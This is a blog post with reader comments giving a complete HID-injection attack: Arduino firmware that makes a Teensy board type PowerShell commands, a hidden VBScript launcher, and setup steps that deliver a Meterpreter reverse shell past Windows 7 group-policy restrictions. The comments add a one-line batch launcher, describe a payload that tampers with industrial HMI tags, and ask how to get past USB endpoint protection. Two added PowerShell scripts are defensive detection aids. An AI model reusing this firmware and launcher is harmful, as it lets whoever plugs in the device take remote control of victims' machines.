Teensy++2.0 and Metasploit

Just got my teensy from PJRC …

http://www.pjrc.com/store/teensypp.html

This little bugger has a lot of potential, so I decided to test it against the mighty Windows 7 with all the recommended security settings and restrictions in place, like Autorun and Autoplay disabled through domain policy, etc. In the end it was possible to own the box and compromise it using the technique described below. It was fun working on this project, so I decided to share my thoughts and code.

The environment setup is well explained on the PJRC site so I’m not gonna go through this here. My current config and libs are as follows:

  1. Teensy linux loader http://www.pjrc.com/teensy/loader.html
  2. Arduino-0022 http://arduino.googlecode.com/files/arduino-0022.tgz
  3. Teensyduinobeta Test 0.93 http://www.pjrc.com/teensy/beta/teensyduino
  4. PHUKD Library from IronGeek  http://www.irongeek.com/downloads/phukdlib0.2.zip
  5. Linux AVR development tools
    (On Debian apt-get install gcc-avr, binutils-avr, avr-libc, gdb-avr)

So with everything in place I’ve decided to create my own trojaned USB device.

Teensy++2.0 comes equipped with about 120 kilobytes of mass storage that can be used to host our binary payloads. This needs to be activated in the Arduino IDE's Tools menu like so:

So our Teensy board will act like a USB keyboard and USB Mass storage device together.
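As an added check (not part of the original post, written from the defender's side), here is a PowerShell script that walks the PnP device tree and flags a single USB composite device that presents both a HID keyboard and a USB disk, which is exactly the shape of this keyboard-plus-storage setup. It assumes Windows 8 or later, where the PnpDevice module (Get-PnpDevice, Get-PnpDeviceProperty) is built in, and an elevated session; the helper names Get-UsbParentChain and Find-KeyboardAndStorageComposites are my own.

```powershell
# Added example, not part of the original post. Flags USB composite devices
# that present both a HID keyboard and a USB disk. Assumes Windows 8+ /
# PowerShell 4+ (PnpDevice module) and an elevated session.

function Get-UsbParentChain {
    # Walk up the PnP tree from a device instance and return its ancestors,
    # closest first. Depth 3 covers HID -> USB interface -> composite device.
    param([Parameter(Mandatory)][string]$InstanceId, [int]$Depth = 3)
    $chain = @()
    $current = $InstanceId
    for ($i = 0; $i -lt $Depth; $i++) {
        try {
            $current = (Get-PnpDeviceProperty -InstanceId $current `
                -KeyName 'DEVPKEY_Device_Parent' -ErrorAction Stop).Data
        } catch { break }
        if (-not $current) { break }
        $chain += $current
    }
    return $chain
}

function Find-KeyboardAndStorageComposites {
    # First record every composite USB device (USB\VID_xxxx&PID_xxxx\serial,
    # i.e. no &MI_ interface suffix) that owns a HID keyboard, then check
    # whether a USBSTOR disk hangs off one of the same composite devices.
    $kbParents = @{}
    Get-PnpDevice -Class Keyboard -PresentOnly -ErrorAction SilentlyContinue |
        Where-Object { $_.InstanceId -like 'HID\VID_*' } |
        ForEach-Object {
            $kb = $_
            foreach ($p in (Get-UsbParentChain $kb.InstanceId)) {
                if ($p -like 'USB\VID_*' -and $p -notlike '*&MI_*') { $kbParents[$p] = $kb }
            }
        }

    Get-PnpDevice -Class DiskDrive -PresentOnly -ErrorAction SilentlyContinue |
        Where-Object { $_.InstanceId -like 'USBSTOR\*' } |
        ForEach-Object {
            $disk = $_
            foreach ($p in (Get-UsbParentChain $disk.InstanceId)) {
                if ($kbParents.ContainsKey($p)) {
                    [pscustomobject]@{
                        CompositeDevice = $p
                        Keyboard        = $kbParents[$p].FriendlyName
                        Disk            = $disk.FriendlyName
                    }
                }
            }
        }
}

Find-KeyboardAndStorageComposites | Format-Table -AutoSize
```

A hit means one physical USB device has enumerated as both a keyboard and a disk; an ordinary keyboard or thumb drive never does both, so this is a low-noise signal. It only sees the device while it is plugged in, it does not catch a HID-only variant that carries no storage, and on Windows 7 (which lacks Get-PnpDevice) the same walk has to be done over Win32_PnPEntity via WMI.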

Create a new project from the Arduino IDE, for example: usb-project. This is important because the IDE will create a subfolder by this name in its directory, which will be useful later on.

Here is the code I've created to run a meterpreter payload executable off the Teensy after it is plugged into the target's USB port.

/* The following is Astro's code using the PHUKD libs from
   Irongeek http://www.irongeek.com/downloads/phukdlib0.2.zip
   to do some Keyboard stuff with Teensy only for educational purposes.
   Use at your own risk!
   To learn more about Teensyduino see:
     http://www.pjrc.com/teensy/teensyduino.html
     http://www.arduino.cc/en/Reference/HomePage
   Look in arduino-xxxx\hardware\teensy\cores\tensy_hid\usb_api.h for key definitions.
   Edit arduino-xxxx\hardware\teensy\cores\tensy_hid\usb_private.h to change the
   USB Vendor and Product ID. */
#include <phukdlib.h>

void setup() {
}

void loop()
{
  delay(5000);                              // Wait 5 secs to settle down
  Keyboard.set_modifier(MODIFIERKEY_CTRL);  // Hold Ctrl ...
  Keyboard.send_now();
  Keyboard.set_key1(KEY_ESC);               // ... and press Esc to open the Start Menu
  Keyboard.send_now();
  Keyboard.set_modifier(0);                 // Release modifier and key
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.print("powershell");
  PressAndRelease(KEY_ENTER,1);
  delay(5000);                              // Need some time on some machines to open powershell
  Keyboard.print("$disk = wmic logicaldisk list brief | select-string -pattern tinydisk | out-string");
  PressAndRelease(KEY_ENTER,1);
  delay(500);
  Keyboard.print("$drive = $disk.substring(2,2)");
  PressAndRelease(KEY_ENTER,1);
  delay(500);
  Keyboard.print("invoke-expression $drive");
  Keyboard.set_key1(KEY_BACKSLASH);         // Backslash sent as a raw key, see the explanation below
  Keyboard.send_now();
  Keyboard.print("exec.vbs");
  PressAndRelease(KEY_ENTER,1);
  delay(500);
  Keyboard.print("exit");
  PressAndRelease(KEY_ENTER,1);
  delay(9000000);                           // Long sleep so loop() does not replay the sequence
}

What this code does:

  1. It waits for 5 seconds.
  2. Sends Ctrl+Esc to open the Windows Start Menu (there are group policies which restrict the Win+R combination, for example).
  3. Runs powershell. While most admins lock down cmd.exe by group policy, PowerShell often gets overlooked. (There is a trick to binpatch cmd.exe using a macro in MS Word to get around the restrictions, but I'm not going to cover it here; there is not enough space for a patched cmd.exe on the Teensy anyway.)
  4. Now this was the trickiest part of all; I spent a whole day figuring out how variables in PowerShell work:

     $disk = wmic logicaldisk list brief | select-string -pattern tinydisk | out-string

     Please note the "tinydisk" string here: this is the label we are going to give the FAT12 partition that gets created when we flash the Teensy with our code. The PowerShell environment is a little tricky and weird; since stdout isn't handled like a normal string as it is in Linux, we need a little trick:

     $drive = $disk.substring(2,2)

     Only now do we have a string holding the drive letter of the Teensy USB drive, so we can use it to load the meterpreter payload:

     invoke-expression $drive\exec.vbs

     For some reason I had to send the backslash key manually with a regular Keyboard.set_key1(KEY_BACKSLASH) call, because Keyboard.print() does not handle the backslash and the character after it at all. So the one-line command gets split into multiple parts:

     Keyboard.print("invoke-expression $drive");
     Keyboard.set_key1(KEY_BACKSLASH);
     Keyboard.send_now();
     Keyboard.print("exec.vbs");
  5. So we get to the part where the Teensy calls an exec.vbs file on its mass storage.
  6. Exits PowerShell so it does not stick out on screen.

The exec.vbs is a simple Visual Basic script that silently loads the Meterpreter payload off the Teensy.

' Get a handle to the Windows shell so we can start a process
Set oShell = CreateObject("Wscript.shell")
' Full path of this script, e.g. E:\exec.vbs on the Teensy drive
sPath = Wscript.ScriptFullName
' Keep everything up to and including the last backslash (the script's folder)
x = InstrRev(sPath, "\")
sPath = Left(sPath, x)
' Build the full path of the executable sitting next to this script
sCmd = sPath + "final.exe"
' Run it: window style 0 = hidden, False = do not wait for it to finish
oShell.Run sCmd, 0, False

In this case we are calling a file named final.exe in the root folder of the Teensy mass storage drive. The script runs final.exe silently, without any window popping up. Final.exe is our compiled meterpreter binary payload that will connect back to the multi handler on our pen-test machine.
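As an added detection example (not from the original post, and written from the defender's side), the following PowerShell function looks for the command shape described in the two sections above: a wmic logicaldisk lookup of a volume label, followed by an invoke-expression of a script or executable on the drive letter that was found. It assumes PowerShell 5 or later with Script Block Logging enabled, which writes every executed block, interactive commands included, as Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log (the Windows 7 target in this post would need WMF 5 for that). The function name Test-DriveLetterLaunchPattern and the sample lines are mine, constructed to mirror the keystrokes in the sketch.

```powershell
# Added example, not part of the original post. Hunts PowerShell Script Block
# Logging (Event ID 4104, Microsoft-Windows-PowerShell/Operational) for a
# volume-label drive lookup followed by invoke-expression of a file on that
# drive. Assumes PowerShell 5+ with the logging policy enabled.

function Test-DriveLetterLaunchPattern {
    # Returns $true when, in order, one block enumerates logical disks and
    # filters them by a label, and a later block invoke-expressions a file
    # sitting on a variable-held drive letter (e.g. "$drive\exec.vbs").
    param([string[]]$ScriptBlocks)
    $sawLookup = $false
    foreach ($sb in $ScriptBlocks) {
        if ($sb -match 'wmic\s+logicaldisk' -and $sb -match 'select-string|findstr|find\b') {
            $sawLookup = $true
        }
        # variable, backslash, file name with a script/executable extension
        if ($sawLookup -and $sb -match 'invoke-expression\s+\$\w+\\[^\s]+\.(vbs|exe|bat|cmd|ps1)\b') {
            return $true
        }
    }
    return $false
}

# Constructed sample mirroring what the sketch types into the console.
$sample = @(
    '$disk = wmic logicaldisk list brief | select-string -pattern tinydisk | out-string',
    '$drive = $disk.substring(2,2)',
    'invoke-expression $drive\exec.vbs'
)
Test-DriveLetterLaunchPattern $sample

# Live use: evaluate recent 4104 events oldest-first. Properties[2] holds the
# ScriptBlockText field of that event.
$events = Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
} -MaxEvents 1000 -ErrorAction SilentlyContinue | Sort-Object TimeCreated
if ($events -and (Test-DriveLetterLaunchPattern ($events | ForEach-Object { $_.Properties[2].Value }))) {
    Write-Warning 'Volume-label drive discovery followed by an invoke-expression launch found in the script block log'
}
```

The ordering requirement (lookup before launch) keeps a lone administrative wmic call from firing the rule, and matching on a variable-held drive letter rather than a fixed path is what distinguishes this pattern from a normal script that runs something from a known location. Pairing it with process-creation events for wscript.exe started from a removable drive would cover the second stage as well.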

So before we compile and flash the project onto the Teensy board we need to prepare a few things, first of all the drive label and the files that will reside there. We need a unique disk label for the FAT12 partition on the Teensy, because without it we won't be able to find the drive letter Windows assigns to it. In our case we are using the "tinydisk" label.

So open up your terminal and locate your project folder inside the arduino directory and make sure it has the following:

You need to create a folder inside your project directory called disk. Inside the disk folder create a file called .Volumelabel, edit it and place the volume label name there, in this case tinydisk. Next place the needed files into this directory (exec.vbs and final.exe).

So a final scenario is :

Connect the Teensy to a logged-on Windows 7 machine and let it do its magic. It loads everything automatically and you get rewarded with a remote reverse meterpreter shell on your pen-test laptop.

This is a basic sum-up of a nasty PoC using the Teensy++2.0 board, some Sploit-Fu, little powershell and some vbscript.

Part 2… Avoiding Antivirus

Part 3… The Final Product


12 Responses to Teensy++2.0 and Metasploit

  1. Jeremy says:

    Could this have been simpler if you ran the file from the Teensy without copying it? This looks pretty doable:

    for /f "tokens=1" %i in ('wmic logicaldisk list brief ^| find "MYDISKLABEL"') do @%i\final.exe

    Thanks for the writeup.

    • astr0baby says:

      I guess it would, but I did not want the final.exe window shown when the payload executable gets started, so that's why I've used that vbs script to actually hide the window.

  2. Robert Clark says:

    Hey, I really like what you’ve done here, thank you for taking the time to write it up and share it with the community.

    This doesn’t achieve anything that you couldn’t do with hands on access to the computer but does buy you some cool stuff, it allows you to “plug and forget” as well as do things faster than you could on your own.

    It would be good if there were a way to mask the first stage, where the start menu will open momentarily but as you say Win-R is often disabled.

  3. astr0baby says:

    Thanks for commenting. Sure this does not achieve much, but still, there are ways to add the
    Teensy to a USB mouse or keyboard and trojan the device. Anyways this is more an exercise than a real attack. Next week I will publish some new interesting stuff.

  4. matt says:

    I would like to use your code in some course material but want to give you full credit. Can you provide an approval of this and information as to how you would like a reference within the material?

  5. astr0baby says:

    Sure Matt, go ahead and use this. As for the reference just use my nick or this blog post.

  6. Matt says:

    Awesome … I have my own payload (exec.vbs) I am running to modify an HMI’s tags for a control system environment. The script kills the HMI runtime, swaps in fake tags, and restarts the HMI runtime. Check us out over at cybati.org to see the course I am adding this script in to. Awesome stuff – the concept of hardware hacks / supply chain is daunting!

  7. Pingback: Teensy++2 Metasploit Part. 2 | Astrobaby's random thoughts

  8. David says:

    Hello…Is there any way to get this to work if USB endpoint protection is in place to stop the use of hard disks/pendrives?

  9. Just a tip: The problem you are having with the \ symbol is because this symbol can be used for other things like \n for new line. To output the symbol you just have to use the double \\. It will output as a single one and you are good to go :)
